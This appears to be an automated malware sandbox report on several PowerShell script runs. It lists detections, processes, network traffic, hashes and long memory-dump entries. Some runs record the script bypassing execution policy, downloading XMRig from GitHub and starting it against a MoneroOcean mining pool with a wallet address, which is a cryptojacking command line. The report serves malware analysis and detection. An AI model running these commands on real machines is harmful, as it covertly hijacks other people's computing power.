memory/372-104-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-105-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-106-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-107-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-108-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-109-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-110-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-111-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-112-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-113-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-114-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-115-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-116-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-117-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-118-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-119-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-120-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-121-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-122-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-123-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-124-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-125-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-126-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-127-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-128-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-129-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-130-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-131-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-132-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-133-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-134-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-135-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-136-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-137-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-138-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-139-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-140-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-141-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-142-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-143-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-144-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-145-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-146-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-147-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-148-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-149-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-150-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-151-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-152-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-153-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-154-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-155-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-156-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/2012-0-0x00007FFDA3233000-0x00007FFDA3235000-memory.dmp

memory/2012-1-0x000002125ACF0000-0x000002125AD12000-memory.dmp

memory/2012-7-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4h3lwc5.au2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2012-12-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

memory/2012-13-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

memory/2012-14-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

memory/2012-15-0x00007FFDA3233000-0x00007FFDA3235000-memory.dmp

memory/2012-16-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

memory/2012-17-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:42

Platform

win11-20240508-en

Max time kernel

1673s

Max time network

1684s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4656-0-0x00007FFD8D1F3000-0x00007FFD8D1F5000-memory.dmp

memory/4656-9-0x00000225BD400000-0x00000225BD422000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hamumf1.jgs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-10-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp

memory/4656-11-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp

memory/4656-12-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp

memory/4656-13-0x00007FFD8D1F0000-0x00007FFD8DCB2000-memory.dmp

memory/4656-14-0x00007FFD8D1F3000-0x00007FFD8D1F5000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/4604-0-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp

memory/4604-5-0x000002031F780000-0x000002031F7A2000-memory.dmp

memory/4604-7-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp

memory/4604-10-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp

memory/4604-9-0x000002031F930000-0x000002031F9A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah0edcim.mus.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4604-25-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp

memory/4604-48-0x000002031FAB0000-0x000002031FAC2000-memory.dmp

memory/4604-61-0x000002031F910000-0x000002031F91A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1600-90-0x0000021A2AD30000-0x0000021A2AD50000-memory.dmp

memory/1600-91-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/4604-93-0x00007FFDF4DD3000-0x00007FFDF4DD4000-memory.dmp

memory/1600-92-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/4604-94-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp

memory/1600-95-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-96-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-97-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-98-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-99-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-100-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-101-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-102-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-103-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-104-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-105-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-106-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-107-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-108-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-109-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-110-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-111-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-112-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-113-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-114-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-115-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-116-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-117-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-118-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-119-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-120-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-121-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-122-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-123-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-124-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-125-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-126-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-127-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-128-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-129-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-130-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-131-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-132-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-133-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-134-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-135-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-136-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-137-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-138-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-139-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-140-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-141-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-142-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-143-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-144-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-145-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-146-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-147-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-148-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-149-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-150-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-151-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-152-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-153-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-154-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

memory/1600-155-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:45

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1748,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

memory/224-0-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp

memory/224-10-0x000001EA2E830000-0x000001EA2E852000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40qnqvo4.kv5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/224-11-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

memory/224-12-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

memory/224-13-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

memory/224-14-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

memory/224-15-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp

memory/224-16-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

memory/224-17-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10v2004-20240508-en

Max time kernel

1554s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4588-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xj44tu10.l4x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4588-10-0x000001DB720C0000-0x000001DB720E2000-memory.dmp

memory/4588-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/4588-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/4588-13-0x000001DB72260000-0x000001DB7247C000-memory.dmp

memory/4588-14-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/4588-15-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/4588-16-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

memory/4588-18-0x00007FFF04093000-0x00007FFF04095000-memory.dmp

memory/4588-20-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:18

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
